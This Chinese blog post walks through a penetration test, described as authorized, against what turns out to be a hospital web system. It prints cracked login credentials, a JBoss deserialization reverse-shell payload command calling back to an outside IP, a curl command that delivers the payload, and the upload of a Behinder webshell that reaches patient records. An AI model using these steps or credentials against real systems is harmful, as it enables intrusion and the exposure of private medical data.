记一次渗透实战

文章来源:Sec盾

目标:http://xxx.xx.xxx.xxx:9002/xxx/xxm/login.php

访问目标

59845-crah6hta6h.png

此时此刻,拿出我们拿出好兄弟burp来抓包,看下响应包

55393-tfnibjejv6b.png

尝试枚举,看能不能碰到狗屎运

跑中国人名字典,无结果,表示今天运气不行啊

00638-fj9kzzqjneo.png

废话不多说继续!!!

常规操作 ,对目标目录进行删减 ,发现了目录遍历的漏洞

http://xxx.xx.xxx.xx:9002/xxxying/

29878-43tp81u8bqc.png

尝试能不能获取有用的信息

随意点击,爆出路径,为后面上传webshell 做铺垫

82790-qaavf2ycst.png

之后发现了数据库的文件

56945-7aw7n6et82y.png

发现了两个账号

http://xxx.xx.xxx.xx:9002/xxxxxx/tdb.20xxx129.sql

还发现了两个账号

73662-n78xkqzlnc.png

对密码进行解密

88919-byt79soub46.png

27041-20pahmp7k1i.png

admin/12345678

coolfd/shj811004

获得两个账号 ,尝试登陆

发现两个账号不可用 ,可能是另外一个系统的吧

继续搞呗

找到一个网站

http://www.xxxxxxx.cc/index.html

试试有没有后台

http://www.xxxxxxx.cc/admin/login.php#

http://www.xxxxx.com/

http://www.xxxxxxx.com/admin/login.php#

尝试登陆后台 ,发现coolfd账号可用

24930-tugoflkm5y.png

登陆后台了

尝试找上传点

上传多次无果

/mxxxxtor/atxxxxd/image/20xxx923/20140xxxx11623_39094.jpg

多处

81238-mfqamnaudrc.png

没有写权限

47784-lwyxymlea7o.png

多处上传失败

只能搞ip

对目标ip进行端口扫描

78139-mgm35gtoe98.png

逐个访问,发现了jboss

http://xxx.xx.xxx.xx:9080/

想到jboss 反序列化漏洞

19011-i5o5ab3cqce.png

在网上找了反序列化的exp

将payload生成好了,直接使用

java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 182.92.. 7777

监听端口

23712-7naxhnkolsx.png

curl http://xxx.xx.x.xx:9080/ixxxxx/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser

向目标路径 /invoker/readonly

51084-wxgzu611z2.png

即可拿到目标的最高权限

找到网站路径

发现了PHPinfo探针

http://xxx.xx.xxx.xx:9002/phpinfo.php

32282-kmv4m83qh9.png

好像无法使用下载命令

Curl wget

只能用打包好的工具上传webshell了

6哥工具执行好像乱码了

33037-umb8zewd3jj.png

只好上传冰蝎木马上去

知道路径 直接上传

83267-peh71ilz2uf.png

为了便于管理,上传一个webshell

84032-vs29hoe0yu.png

在文件管理看到了数据库文件

47101-kkure7dhnk8.png

发现了账号和密码

87368-5o3l6r4xu5h.png

解密成功,后台登陆成功

14727-skfy1ca449.png

看起来是医院的系统

35612-h5apz7fk36.png

个人病例信息大量泄露

29934-iugou4vxsg.png

http://xxx.xx.x.xx:9002/zhxxxxg/rxxpg/35735xxxxx80%94369773.jpg

部分报告单泄露

为了安全起见,将木马已经删除了

似乎存在域环境

可惜自己菜 ,未敢深入

93281-ulb8fo63uui.png

05169-ww9ahvlhgg.png

到这里就结束了,授权项目,如有打码不规范,请勿私自渗透,违者后果自负

本文经授权后发布,本文观点不代表立场,转载请联系原作者。
简单python爬虫编写
« 上一篇 05-15
最大的数据库泄露黑产论坛的数据库被泄露
下一篇 » 05-15

相关推荐

「翻译」 如何Bypass rbash

前言我们都知道安全分析师和黑客的关系像tom和jerry一样,一个人采取措施加强安全等级,另外一个人试图绕过它。这种类似的情况出现在我解决CTF挑战的时候...

新秀红队防猝死手册

文章来源:https://github.com/zhutougg/RedteamStandard一切为了不丢分工作环境工作时全部操作均在虚拟机中完成虚拟机...